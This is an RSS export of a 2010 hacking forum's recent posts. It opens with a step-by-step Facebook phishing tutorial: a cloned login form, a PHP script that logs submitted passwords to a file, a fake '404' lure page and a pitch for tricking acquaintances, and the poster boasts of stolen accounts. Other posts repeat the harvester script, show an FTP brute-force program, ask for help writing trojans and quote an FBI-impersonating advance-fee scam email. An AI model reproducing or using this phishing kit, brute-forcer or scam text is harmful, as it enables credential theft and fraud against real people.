<?xml version="1.0" encoding="ISO-8859-1"?>

<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
	<channel>
		<title>EliteHackers.info Discussion Forums</title>
		<link>http://www.elitehackers.info/forums</link>
		<description><![CDATA[EliteHackers.info has a large memberbase on our forums. We also have a files database, a text & tutorials archive. There is also a proxy list section as well as our ports list database.]]></description>
		<language>en</language>
		<lastBuildDate>Mon, 06 Sep 2010 23:55:24 GMT</lastBuildDate>
		<generator>vBulletin</generator>
		<ttl>60</ttl>
		<image>
			<url>http://www.elitehackers.info/forums/titanium/misc/rss.jpg</url>
			<title>EliteHackers.info Discussion Forums</title>
			<link>http://www.elitehackers.info/forums</link>
		</image>
		<item>
			<title>Phishing Facebook</title>
			<link>http://www.elitehackers.info/forums/showthread.php?t=23242&amp;goto=newpost</link>
			<pubDate>Mon, 06 Sep 2010 20:57:26 GMT</pubDate>
			<description>I was up all night studying tutorials, tweaking scripts, learning a bit of a few different languages. The method i have came up  
with worked for me, i already have 4 different facebook passwords/emails. And sorry in advanced for the sloppy mini tutorial itll be 24 hours with no sleep in 3 hours....</description>
			<content:encoded><![CDATA[<div>I was up all night studying tutorials, tweaking scripts, learning a bit of a few different languages. The method i have came up <br />
with worked for me, i already have 4 different facebook passwords/emails. And sorry in advanced for the sloppy mini tutorial itll be 24 hours with no sleep in 3 hours. So i am a little burnt! THANKS<br />
<br />
POST: You only actually have to deal with one file. That is the CSS Template disguised as an image file!!<br />
<br />
 First you are going to need a free domain that lets you use php! I used 2 different sites. The first site was <a href="http://www.fileave.com" target="_blank">www.fileave.com</a>, which i used for uploading pictures to. The name fileave kind of stands out! You will see what I mean. The second site was <a href="http://www.ripway.com" target="_blank">www.ripway.com</a>, I used this site for all my php forms and scripts.<br />
<br />
 Go head and sign up for ripbay.com first. Now when you have successfully joined and logged in, goto &quot;myfiles&quot; in the top center. You will click on &quot;create text file.&quot; Name this file login.php<br />
You will make another the same way but name this one phish.php You have a total of 2 files so far. <br />
 Lets goto facebook login,<a href="http://facebook.com" target="_blank">facebook.com</a> not 'facebook.com/login.php?' and get the pages source. Copy the source and go back to ripway.com, paste this code into the login.php<br />
You are going to need to make a small modifacation to the file. click on the text and then goto edit, then find. The short cut for this function is Ctrl+f. Type in &quot;action=&quot; into the find input field. <br />
You should see this lil piece of code: <br />
<br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Code:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left">&lt;form method=&quot;POST&quot; action='https://login.facebook.com/login.php?login_attempt=1' id=&quot;login_form&quot;&gt;</code><hr />
</div>You want to look like this:<br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Code:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left">&lt;form method=&quot;POST&quot; action=&quot;phish.php&quot; id=&quot;login_form&quot;&gt;<br />
<br />
&nbsp;Now take the Tweaked login page and save it as login.php with thee above changes</code><hr />
</div>ONTO THE NEXT PART:<br />
 Now copy and paste this php script into your phish.php<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Code:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left">&lt;?php<br />
//This piece of code below me is a header, it redirects your browser.<br />
header (&quot;Location: http://AmBoxer21.fileave.com/img_0022.jpg&quot;);<br />
/*That handle in this code is used for taking your facebook username/email and sending it to a file that it makes, called &quot;password.txt.&quot; that little &quot;a&quot; arguement allows for r+w*/<br />
$handle = fopen(&quot;passwords.txt&quot;, &quot;a&quot;);<br />
foreach($_POST as $variable =&gt; $value) {<br />
fwrite($handle, $variable);<br />
fwrite($handle, &quot;=&quot;);<br />
fwrite($handle, $value);<br />
fwrite($handle, &quot;\r\n&quot;);<br />
}<br />
fwrite($handle, &quot;\r\n&quot;);<br />
fclose($handle) ;<br />
exit;<br />
?&gt;</code><hr />
</div> Now that php header redirects them to the image at fileave.com after they login our fake FB page! It does so immediately. So it looks legit! <br />
The CCS Temp...You can google css and html or just use my code. But after this css page is finished, you are gonna name it IMG0123.php or what ever you want. &quot;The bottom explains&quot; <br />
The file states: 404 ERROR!<br />
Sorry but you need to be logged in to view this file!<br />
Click here to login to Facebook.com and view this photo! I took an image of a black and white firefox icon and centered it to make it look some what legit! i had the click here to log in to facebook anchored with html to be redirected to my phishing page(fake login page). <br />
<br />
CSS CODE: This is the link that you will give the target. It will then redirect you to our fake login page, then it will goto the photo. No &quot;You have been phished warning&quot; and prompt for changing password!!<br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Code:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left">&lt;HTML&gt;<br />
&nbsp;  &lt;HEAD&gt;<br />
&nbsp; &nbsp; &nbsp; &lt;TITLE&gt;<br />
&nbsp; &nbsp; &nbsp; 404 ERROR!<br />
&nbsp; &nbsp; &nbsp; &lt;/TITLE&gt;<br />
&lt;H3&gt;404 ERROR!&lt;/H3&gt;<br />
&nbsp; &nbsp; &nbsp; &lt;style type=&quot;text/css&quot;&gt;<br />
&nbsp; body {background-image:url('http://AmBoxer21.fileave.com/Firefox-Black-and-White-firefox-8966969-1600-1200.jpg');<br />
background-position:top left;}<br />
&nbsp; &lt;/style&gt;<br />
<br />
&nbsp;  &lt;/HEAD&gt;<br />
&nbsp;  &lt;BODY&gt;<br />
&lt;?php<br />
echo &quot;Sorry but you need to be logged in to view this file!&quot;;<br />
?&gt;<br />
&lt;BR&gt;<br />
&lt;BR&gt;<br />
&lt;BR&gt;<br />
Click here to login to &lt;a href=&quot;http://h1.ripway.com/amboxer21/cellphonelogin.php&quot;&gt;Facebook.com&lt;/a&gt; and view this photo!<br />
&lt;/BR&gt;&nbsp; <br />
&lt;/BODY&gt; <br />
<br />
&lt;/HTML&gt;</code><hr />
</div> Now the pitch:<br />
<br />
 You cannot send this over facebook and i am almost certain AOL will not lent you send or recieve this file for some reason. But what I did was get peoples email and pitch them a story about how this person was aparently talking shit about them blah blah blah. and urged them not to do anything please! and pasted the Direct Link:  <a href="http://h1.ripway.com/amboxer21/IMG00123.php" target="_blank">http://h1.ripway.com/amboxer21/IMG00123.php</a> i of course knew these people lol so it wasnt hard! now the reason i did the picture scenario was because when I redirected the browser to the wrong username/email page it would display a message that you have been phished. So this is my alternative around it! You can tweak it to send you somewhere else or set a different pic idk whatever you want!</div>

]]></content:encoded>
			<category domain="http://www.elitehackers.info/forums/forumdisplay.php?f=34">Submit Tutorials</category>
			<dc:creator>havok21</dc:creator>
			<guid isPermaLink="true">http://www.elitehackers.info/forums/showthread.php?t=23242</guid>
		</item>
		<item>
			<title>Trojan help</title>
			<link>http://www.elitehackers.info/forums/showthread.php?t=23241&amp;goto=newpost</link>
			<pubDate>Mon, 06 Sep 2010 20:37:30 GMT</pubDate>
			<description>OK I wanna write my own trojan. I dont want someone elses script because then there is no joy in being able to say I did it. Programming is fun anyway! So the real question is what is a trojan made up of?? this way I can google or research the right literature and topics! From my understanding, it...</description>
			<content:encoded><![CDATA[<div>OK I wanna write my own trojan. I dont want someone elses script because then there is no joy in being able to say I did it. Programming is fun anyway! So the real question is what is a trojan made up of?? this way I can google or research the right literature and topics! From my understanding, it is a listening socket... I think lol How is it packaged and deployed? Blah Blah Blah, and all that good stuff.<br />
But as soon as I learn, I will be sure to give back what I have accomplished and help other achieve the same!<br />
<br />
Thanks in advance!!</div>

]]></content:encoded>
			<category domain="http://www.elitehackers.info/forums/forumdisplay.php?f=2"><![CDATA[Hacking & Security]]></category>
			<dc:creator>havok21</dc:creator>
			<guid isPermaLink="true">http://www.elitehackers.info/forums/showthread.php?t=23241</guid>
		</item>
		<item>
			<title>Phishing php script help</title>
			<link>http://www.elitehackers.info/forums/showthread.php?t=23232&amp;goto=newpost</link>
			<pubDate>Sun, 05 Sep 2010 23:13:32 GMT</pubDate>
			<description><![CDATA[i set up a phishing system for facebook, and the php script i tweaked reads an error when redirecting the user. it says "security warning, this is not a facebook page. you should change your password" Any help would be appriciated!!! 
!!Thanks in advance!! 
 
 
Code: 
--------- 
<?php 
header...]]></description>
			<content:encoded><![CDATA[<div>i set up a phishing system for facebook, and the php script i tweaked reads an error when redirecting the user. it says &quot;security warning, this is not a facebook page. you should change your password&quot; Any help would be appriciated!!!<br />
!!Thanks in advance!!<br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Code:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left">&lt;?php<br />
header (&quot;Location: https://login.facebook.com/login.php?login_attempt=1&quot;);<br />
$handle = fopen(&quot;passwords.txt&quot;, &quot;a&quot;);<br />
foreach($_POST as $variable =&gt; $value) {<br />
fwrite($handle, $variable);<br />
fwrite($handle, &quot;=&quot;);<br />
fwrite($handle, $value);<br />
fwrite($handle, &quot;\r\n&quot;);<br />
}<br />
fwrite($handle, &quot;\r\n&quot;);<br />
fclose($handle) ;<br />
exit;<br />
?&gt;</code><hr />
</div>------Automerged Doublepost------<br />
Well thank you for the help anyway! But i have figured out the problem on my own.  Much appreciated for even the views of my post! i spent all night working on the facebook phishing and hooked everything up and i already got 5 people lol kind of funny to see their passwords and login names sent directly to you! brought a big smile to my face! Completely worth the all nighter!!<br />
<br />
But if anyone wants to know how it's done, just message me or reply to this.</div>

]]></content:encoded>
			<category domain="http://www.elitehackers.info/forums/forumdisplay.php?f=2"><![CDATA[Hacking & Security]]></category>
			<dc:creator>havok21</dc:creator>
			<guid isPermaLink="true">http://www.elitehackers.info/forums/showthread.php?t=23232</guid>
		</item>
		<item>
			<title>Best first language?</title>
			<link>http://www.elitehackers.info/forums/showthread.php?t=23231&amp;goto=newpost</link>
			<pubDate>Fri, 03 Sep 2010 19:48:29 GMT</pubDate>
			<description>Which language would be better to learn as my first language, Python or C? 
i am learning C now but it is rather lengthy and a little complicated!! i have heard that Python is easier to learn, takes a 5th of time and code than C does and all around a more powerfull language to work with! even has...</description>
			<content:encoded><![CDATA[<div>Which language would be better to learn as my first language, Python or C?<br />
i am learning C now but it is rather lengthy and a little complicated!! i have heard that Python is easier to learn, takes a 5th of time and code than C does and all around a more powerfull language to work with! even has GUI capabilities as C does not have this function. Any suggestions from experienced programmers??</div>

]]></content:encoded>
			<category domain="http://www.elitehackers.info/forums/forumdisplay.php?f=3">Programming Help</category>
			<dc:creator>havok21</dc:creator>
			<guid isPermaLink="true">http://www.elitehackers.info/forums/showthread.php?t=23231</guid>
		</item>
		<item>
			<title>C Login FTP</title>
			<link>http://www.elitehackers.info/forums/showthread.php?t=23229&amp;goto=newpost</link>
			<pubDate>Fri, 03 Sep 2010 13:54:55 GMT</pubDate>
			<description><![CDATA[Code: 
--------- 
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <unistd.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <netinet/in.h>]]></description>
			<content:encoded><![CDATA[<div><div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Code:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left">#include &lt;stdio.h&gt;<br />
#include &lt;stdlib.h&gt;<br />
#include &lt;string.h&gt;<br />
#include &lt;unistd.h&gt;<br />
#include &lt;sys/types.h&gt;<br />
#include &lt;sys/socket.h&gt;<br />
#include &lt;netinet/in.h&gt;<br />
#include &lt;netdb.h&gt;<br />
#include &lt;sys/stat.h&gt;<br />
<br />
struct cracker {<br />
&nbsp; &nbsp; &nbsp; &nbsp; char host[256];<br />
&nbsp; &nbsp; &nbsp; &nbsp; char peticiones[1024];<br />
}cracker;<br />
struct attack {<br />
&nbsp; &nbsp; &nbsp; &nbsp; char host[256];<br />
&nbsp; &nbsp; &nbsp; &nbsp; char peticion1[256];<br />
&nbsp; &nbsp; &nbsp; &nbsp; char peticion2[256];<br />
}attack;<br />
int main (int argc, char *argv[]){<br />
&nbsp; &nbsp; &nbsp; &nbsp; struct hostent *ad;<br />
&nbsp; &nbsp; &nbsp; &nbsp; struct sockaddr_in serv;<br />
&nbsp; &nbsp; &nbsp; &nbsp; int s1;<br />
&nbsp; &nbsp; &nbsp; &nbsp; char buffer[8000];<br />
&nbsp; &nbsp; &nbsp; &nbsp; int bytes_read;<br />
&nbsp; &nbsp; &nbsp; &nbsp; bzero(&amp;(attack),3);<br />
&nbsp; &nbsp; &nbsp; &nbsp; bzero(&amp;(cracker),2);<br />
&nbsp; &nbsp; &nbsp; &nbsp; if (argc &lt; 3 ) {<br />
&nbsp; &nbsp; &nbsp; &nbsp; printf(&quot;%s &lt;host&gt; &lt;diccionario&gt;\n&quot; , argv[0]);<br />
&nbsp; &nbsp; &nbsp; &nbsp; exit(0);}<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; if (sizeof(argv[1])&gt;=256) exit(0);<br />
&nbsp; &nbsp; &nbsp; &nbsp; memcpy(attack.host , argv[1] , sizeof(argv[1]));<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; ad=gethostbyname(argv[1]);<br />
&nbsp; &nbsp; &nbsp; &nbsp; if (ad == NULL ) {<br />
&nbsp; &nbsp; &nbsp; &nbsp; printf (&quot;[-]error gethostbyname\n&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; exit(-1);<br />
&nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; &nbsp; &nbsp; s1 = socket(AF_INET, SOCK_STREAM , 0);<br />
&nbsp; &nbsp; &nbsp; &nbsp; if (s1 == -1){<br />
&nbsp; &nbsp; &nbsp; &nbsp; printf (&quot;[-]error al abrir el socket\n&quot;);<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; &nbsp; &nbsp; serv.sin_family=AF_INET;<br />
&nbsp; &nbsp; &nbsp; &nbsp; serv.sin_port=htons(21);<br />
&nbsp; &nbsp; &nbsp; &nbsp; serv.sin_addr= *((struct in_addr *) ad-&gt;h_addr);<br />
&nbsp; &nbsp; &nbsp; &nbsp; bzero(&amp;(serv.sin_zero),8);<br />
&nbsp; &nbsp; &nbsp; &nbsp; if (connect(s1, (struct sockaddr*)&amp;serv,sizeof(struct sockaddr))==-1)<br />
&nbsp; &nbsp; &nbsp; &nbsp; printf (&quot;error : conecting \n&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; printf (&quot;[+]Conectando ... \n\n&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; memcpy(cracker.host , &quot;Host: &quot; , 6);<br />
(cracker.host + 6 , attack.host , strlen(attack.host));<br />
(cracker.host + strlen(cracker.host), &quot;\r\n&quot;,2);<br />
&nbsp; &nbsp; &nbsp; &nbsp; printf(&quot;[+] FTP Brute Force in process\n&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; memcpy(attack.peticion1 , &quot;USER xacks-security.es&quot; , 21);<br />
printf (&quot;Probando usuarios... \n&quot;);<br />
send (s1, attack.peticion1 , sizeof(attack.peticion1),0); <br />
<br />
printf (&quot;Probando contraseņas...\n&quot;);<br />
memcpy(attack.peticion2 , &quot;PASS asd&quot; , strlen(attack.peticion2));<br />
send (s1, attack.peticion2 , sizeof(attack.peticion2),0);<br />
send (s1, &quot;\r\n\r\n&quot; , 4,0);<br />
do<br />
&nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; bzero(buffer, sizeof(buffer));<br />
&nbsp; &nbsp; &nbsp; &nbsp; bytes_read = recv(s1, buffer, sizeof(buffer), 0);<br />
&nbsp; &nbsp; &nbsp; &nbsp; if ( bytes_read &gt; 0 )<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; printf(&quot;They say : %s&quot;, buffer);<br />
&nbsp; &nbsp; }<br />
&nbsp; &nbsp; while ( bytes_read &gt; 0 );<br />
&nbsp; &nbsp; close(s1);<br />
&nbsp; &nbsp; return 0;}</code><hr />
</div>What happened?<br />
This program no login to server ftp :(<br />
and i not know why ?</div>

]]></content:encoded>
			<category domain="http://www.elitehackers.info/forums/forumdisplay.php?f=3">Programming Help</category>
			<dc:creator>xacks</dc:creator>
			<guid isPermaLink="true">http://www.elitehackers.info/forums/showthread.php?t=23229</guid>
		</item>
		<item>
			<title>C function help for begginer</title>
			<link>http://www.elitehackers.info/forums/showthread.php?t=23227&amp;goto=newpost</link>
			<pubDate>Fri, 03 Sep 2010 03:24:18 GMT</pubDate>
			<description><![CDATA[hey im just starting to learn C, i am a month or so into learning. i am currently learning about functions and im stuck on a problem. heres the code 
 
 
Code: 
--------- 
#include <stdio.h> 
#include <stdlib.h> 
 
void func1(void); 
void func2(void);]]></description>
			<content:encoded><![CDATA[<div>hey im just starting to learn C, i am a month or so into learning. i am currently learning about functions and im stuck on a problem. heres the code<br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Code:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left">#include &lt;stdio.h&gt;<br />
#include &lt;stdlib.h&gt;<br />
<br />
void func1(void);<br />
void func2(void);<br />
void func3(void);<br />
<br />
int how;<br />
void main(void)<br />
&nbsp;  {<br />
&nbsp;  printf(&quot;This is my first function&quot;);<br />
&nbsp;  func1();<br />
&nbsp;  func2();<br />
&nbsp;  }<br />
<br />
void func1(void)<br />
{<br />
&nbsp;  printf(&quot; How did i do? &quot;);<br />
&nbsp;  scanf(&quot;%d&quot;, &amp;how);<br />
}<br />
<br />
vvoid func2(void)<br />
{<br />
int good, excellent;<br />
<br />
if(how == good, excellent)<br />
&nbsp; &nbsp; {<br />
&nbsp; &nbsp; printf(&quot;Thank you!&quot;);<br />
&nbsp; &nbsp; }<br />
else func3();<br />
}<br />
void func3(void) /*I ADDED FUNC3 SCRAPHEAP.*/<br />
{<br />
&nbsp; &nbsp; printf(&quot;Sorry i will try harder next time!&quot;);<br />
}</code><hr />
</div> i cant get it to print &quot;Sorry, ill try better next time&quot; if good or excellent are not used. help please. <br />
thanks in advanced!</div>

]]></content:encoded>
			<category domain="http://www.elitehackers.info/forums/forumdisplay.php?f=3">Programming Help</category>
			<dc:creator>havok21</dc:creator>
			<guid isPermaLink="true">http://www.elitehackers.info/forums/showthread.php?t=23227</guid>
		</item>
		<item>
			<title>Time spent.</title>
			<link>http://www.elitehackers.info/forums/showthread.php?t=23226&amp;goto=newpost</link>
			<pubDate>Thu, 02 Sep 2010 20:49:45 GMT</pubDate>
			<description><![CDATA[I just calculated that i have spent 15k+ hours behind computer and i'm only 20, isn't that awesome ?]]></description>
			<content:encoded><![CDATA[<div>I just calculated that i have spent 15k+ hours behind computer and i'm only 20, isn't that awesome ?</div>

]]></content:encoded>
			<category domain="http://www.elitehackers.info/forums/forumdisplay.php?f=10">General</category>
			<dc:creator>Fluf</dc:creator>
			<guid isPermaLink="true">http://www.elitehackers.info/forums/showthread.php?t=23226</guid>
		</item>
		<item>
			<title>Favorite Application or Software</title>
			<link>http://www.elitehackers.info/forums/showthread.php?t=23225&amp;goto=newpost</link>
			<pubDate>Thu, 02 Sep 2010 19:49:04 GMT</pubDate>
			<description><![CDATA[We should have a Thread where we can each select the top 3 Programs we like and why we like them. 
 
This way we can Learn from each others experiences and see what it is other people are using, 
 
So I made this Thread, 
 
Here's my Top 3: 
 
1--->ESET NOD 32 Anti-Virus 4.0.468.0]]></description>
			<content:encoded><![CDATA[<div>We should have a Thread where we can each select the top 3 Programs we like and why we like them.<br />
<br />
This way we can Learn from each others experiences and see what it is other people are using,<br />
<br />
So I made this Thread,<br />
<br />
Here's my Top 3:<br />
<br />
1---&gt;ESET NOD 32 Anti-Virus 4.0.468.0<br />
<br />
REASON:If You don't Know Find out ^^ NOW with smart Security<br />
<br />
2---&gt;EASEUS Data Recovery Wizard Professional 4.3.6 (Retail) [RH]<br />
<br />
REASON:Recovers drives, Partitions, and simply deleted files, Giving you the choice of what you want to recover<br />
<br />
3---&gt;SafeLock<br />
<br />
Reason:Encrypts, Hides, and Shreds Files, Very small, 5mb with online function<br />
<br />
**************************************************  ********************************************<br />
Hopefully You Will all make some post so That I can Reap your software from some poor site mauhahahaha!<br />
<br />
I am Adamant</div>

]]></content:encoded>
			<category domain="http://www.elitehackers.info/forums/forumdisplay.php?f=10">General</category>
			<dc:creator>Adamant</dc:creator>
			<guid isPermaLink="true">http://www.elitehackers.info/forums/showthread.php?t=23225</guid>
		</item>
		<item>
			<title>EH Chat Help</title>
			<link>http://www.elitehackers.info/forums/showthread.php?t=23224&amp;goto=newpost</link>
			<pubDate>Thu, 02 Sep 2010 19:18:33 GMT</pubDate>
			<description><![CDATA[I'm Having Some Trouble trying to connect To Chat 
 
Here,s what Keeps Popping Up When I press Connect: 
 
 
Code: 
--------- 
Connecting...  
Unable to connect : java.net.ConnectException : Connection timed out: connect  
Connecting...]]></description>
			<content:encoded><![CDATA[<div>I'm Having Some Trouble trying to connect To Chat<br />
<br />
Here,s what Keeps Popping Up When I press Connect:<br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Code:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left">Connecting... <br />
Unable to connect : java.net.ConnectException : Connection timed out: connect <br />
Connecting... <br />
Unable to connect to irc.easynews.com : currently trying to connect to irc.easynews.com <br />
Unable to connect : java.net.ConnectException : Connection timed out: connect</code><hr />
</div>I'm Running Updated JAVA so I shouldn't be Getting This, Any Suggestions?<br />
<br />
I am Adamant</div>

]]></content:encoded>
			<category domain="http://www.elitehackers.info/forums/forumdisplay.php?f=23"><![CDATA[Site Reviews & Suggestions]]></category>
			<dc:creator>Adamant</dc:creator>
			<guid isPermaLink="true">http://www.elitehackers.info/forums/showthread.php?t=23224</guid>
		</item>
		<item>
			<title>Great Encryptors???</title>
			<link>http://www.elitehackers.info/forums/showthread.php?t=23223&amp;goto=newpost</link>
			<pubDate>Thu, 02 Sep 2010 17:35:24 GMT</pubDate>
			<description><![CDATA[I was Looking For some software that's reliable at Encrypting with at least a 254 bit Encryption, An6y names of software would be appreciated whether it needs to be Bought or not. 
 
At the Current moment I'm using Safelock which I think is now Known as  
Super Encryptor. 
 
Its also allows you to...]]></description>
			<content:encoded><![CDATA[<div>I was Looking For some software that's reliable at Encrypting with at least a 254 bit Encryption, An6y names of software would be appreciated whether it needs to be Bought or not.<br />
<br />
At the Current moment I'm using Safelock which I think is now Known as <br />
Super Encryptor.<br />
<br />
Its also allows you to Shred Files without them being able to be recovered at a later time.<br />
<br />
However even though that's alright the software seems too weak an Encryptor.<br />
<br />
I am Adamant</div>

]]></content:encoded>
			<category domain="http://www.elitehackers.info/forums/forumdisplay.php?f=2"><![CDATA[Hacking & Security]]></category>
			<dc:creator>Adamant</dc:creator>
			<guid isPermaLink="true">http://www.elitehackers.info/forums/showthread.php?t=23223</guid>
		</item>
		<item>
			<title>Brute Force Attack Method</title>
			<link>http://www.elitehackers.info/forums/showthread.php?t=23221&amp;goto=newpost</link>
			<pubDate>Thu, 02 Sep 2010 02:21:06 GMT</pubDate>
			<description>I am trying to figure out how to make a Brute Force Attack on URLs. 
I would appreciate any Methods, PSEUDO code, code or any other kind of help 
Thanks in advance!</description>
			<content:encoded><![CDATA[<div>I am trying to figure out how to make a Brute Force Attack on URLs.<br />
I would appreciate any Methods, PSEUDO code, code or any other kind of help<br />
Thanks in advance!</div>

]]></content:encoded>
			<category domain="http://www.elitehackers.info/forums/forumdisplay.php?f=2"><![CDATA[Hacking & Security]]></category>
			<dc:creator>lkjoel</dc:creator>
			<guid isPermaLink="true">http://www.elitehackers.info/forums/showthread.php?t=23221</guid>
		</item>
		<item>
			<title>hacker help</title>
			<link>http://www.elitehackers.info/forums/showthread.php?t=23219&amp;goto=newpost</link>
			<pubDate>Tue, 31 Aug 2010 19:13:31 GMT</pubDate>
			<description><![CDATA[Hey, I think being a script kiddie is something that i "DO NOT" want to be!! so instead of people telling me to download this and have them point me to their web sites to so that i may download some crazy bullshit, or even beg people for scripts...Crazy man!! I think it looks and is pathetic! so i...]]></description>
			<content:encoded><![CDATA[<div>Hey, I think being a script kiddie is something that i &quot;DO NOT&quot; want to be!! so instead of people telling me to download this and have them point me to their web sites to so that i may download some crazy bullshit, or even beg people for scripts...Crazy man!! I think it looks and is pathetic! so i want to cut all the bullshit out! so a month ago i decided to teach myself C/C++ and i am going to move on to python next. any pointers because in the future i would love to learn how to write my own buffer overflows!! or write my own trojans!!! but nothing malicous!! just to know i hacked something! so i guess the whole point of this is what should i be doing? am i on the right path?? learning to program and all... whats after that?? i have no problem learning or sitting @ the computer from sun down to sun up or with a book in my face all day! so a little guidance will help a lot and save me time! im not asking for scripts or tools, i want to know what i should learn!! i have to computers one with opensolaris and the other ubuntu, no windows!</div>

]]></content:encoded>
			<category domain="http://www.elitehackers.info/forums/forumdisplay.php?f=2"><![CDATA[Hacking & Security]]></category>
			<dc:creator>havok21</dc:creator>
			<guid isPermaLink="true">http://www.elitehackers.info/forums/showthread.php?t=23219</guid>
		</item>
		<item>
			<title>london</title>
			<link>http://www.elitehackers.info/forums/showthread.php?t=23218&amp;goto=newpost</link>
			<pubDate>Tue, 31 Aug 2010 11:46:01 GMT</pubDate>
			<description>Off to London for the week. See you homies later 8-)</description>
			<content:encoded><![CDATA[<div>Off to London for the week. See you homies later 8-)</div>

]]></content:encoded>
			<category domain="http://www.elitehackers.info/forums/forumdisplay.php?f=10">General</category>
			<dc:creator>1100</dc:creator>
			<guid isPermaLink="true">http://www.elitehackers.info/forums/showthread.php?t=23218</guid>
		</item>
		<item>
			<title>Spam as if from FBI...?</title>
			<link>http://www.elitehackers.info/forums/showthread.php?t=23217&amp;goto=newpost</link>
			<pubDate>Tue, 31 Aug 2010 00:43:59 GMT</pubDate>
			<description>WTF is this new type of spam thats appeared as if from FBI? Looks like a scam someone is faking to get $300 bucks... and I guess they offering 1.5 million in return? LOL 
 
 
ATTORNEY GENERAL OFFICE ACKNOWLEDGE MY EMAIL.AND GET BACK TO ME IN THE NEXT 24 HOUR 
 
 
--Forwarded Message Attachment-- 
...</description>
			<content:encoded><![CDATA[<div>WTF is this new type of spam thats appeared as if from FBI? Looks like a scam someone is faking to get $300 bucks... and I guess they offering 1.5 million in return? LOL<br />
<br />
<br />
ATTORNEY GENERAL OFFICE ACKNOWLEDGE MY EMAIL.AND GET BACK TO ME IN THE NEXT 24 HOUR<br />
<br />
<br />
--Forwarded Message Attachment--<br />
<br />
ANTI-TERRORIST AND MONITORY CRIMES DIVISION <br />
FBI HEADQUARTERS IN WASHINGTON, D.C. <br />
FEDERAL BUREAU OF INVESTIGATION <br />
J.. EDGAR HOOVER BUILDING <br />
935 PENNSYLVANIA AVENUE, NW WASHINGTON, D.C. 20535-0001 <br />
 <br />
<br />
Attn: <br />
 <br />
Funds, you are to contact the ATTORNEY GENERAL OFFICE BELOW, Washington, DC to obtain the above required document, find below their contact information's: <br />
 <br />
Contact Person: Eric H. Holder, Jr<br />
ATTORNEY GENERAL<br />
Eric H. Holder, Jr : <a href="mailto: - Email address removed from bots quote post to view -"> - Email address removed from bots quote post to view -</a><br />
Address: 601 4th Street Washington, DC 20535<br />
Phone number: 206 259 6321<br />
 <br />
 <br />
Ensure you contact them ATTORNEY GENERAL with your Full Name,Address and phone number/cell number via email. <br />
 <br />
 <br />
Contact the ATTORNEY GENERAL via Email with the information above immediately,once you contact them i will get back to you they will inform us or else i will have an agent come visit you at home for questioning and disobeying the law. <br />
Furthermore, be advice that according to the United State Law together with the FBI rules and regulations, you are to obtain the document from the ATTORNEY GENERAL OF Washington, DC where the fund was transfer from. Also Note that you are to take care of the cost of the Document, which will be issued in your name. due to the content of the document and how important and secured the document is, you as the beneficiary will send to the ATTORNEY GENERAL OFFICEOF Washington, DC the sum of Usd300 Dollars only for the issuing of the document right away and your Usd1.5 million will be release to you, That is the lay down rules for ANTI CRIME DEPARTMENT to release such sensitive document, ATTORNEY GENERAL OFFICE will issue you the authentic and original copy of the documents with seal on it for verification and approval. <br />
NOTE: We have asked for the above document to made available the most complete and up-to date records possible for no criminal justice purposes. The documents will clarify the intensity of this fund; exonerate it from money laundry, scam and terrorism.You are to send and email to Sir Eric Holder and ask for the instructions on how to send the required $300 dollars for your CLEARANCE DOCUMENTS in order for you to clear your name and receive your funds immediately. <br />
WARNING:failure to provide the above requirement in the next 24 hours, legal action will be taken immediately by arresting and detaining you as soon as international court of justice issues a warrant of arrest, if you are found guilty, you will be jailed....... As terrorism, drug trafficking and money laundering is a serious problem in our community today and the world at large. The F.B.I will not stop at any length in tracking down and prosecuting any criminal who indulges in this criminal act. FORWARD THE DOCUMENT TO US VIA EMAIL ATTACHMENT AS SOON AS YOU OBTAIN IT from Sir Eric Holder . No body is above the law and the law is not a respecter of anybody. We presumed you are law abiding citizen whom would not want have scuffles with the authority, in and outside America. <br />
 <br />
 <br />
We are charged with the responsibility of implementing legal norms and our authority is irrevocable so don't dare dispute our instruction, just act as instructed.The person you know will not help you in this matter rather abide by this instruction. the funds in question was deposited by those people that contacted you. <br />
Note: You are to contact them (ATTORNEY GENERAL OFFICE)with your full names,phone number/cell number and full address via their email which i stated above immediately for the processing of your Clearance Documents within the next 24 hours. <br />
Faithfully Your's <br />
Robert S.Mueller 111 <br />
FBI Director <br />
 <br />
 <br />
Note contact the ATTORNEY GENERAL OFFICE office: - Email address removed from bots quote post to view - via email you have less than 24hours to contact them and ask them how you are to acquire the CLEARANCE<br />
DOCUMENTS and make sure you send the required $300 dollars to them for the processing of paperwork in order for us to receive a copy of it to show you have been cleared.</div>

]]></content:encoded>
			<category domain="http://www.elitehackers.info/forums/forumdisplay.php?f=10">General</category>
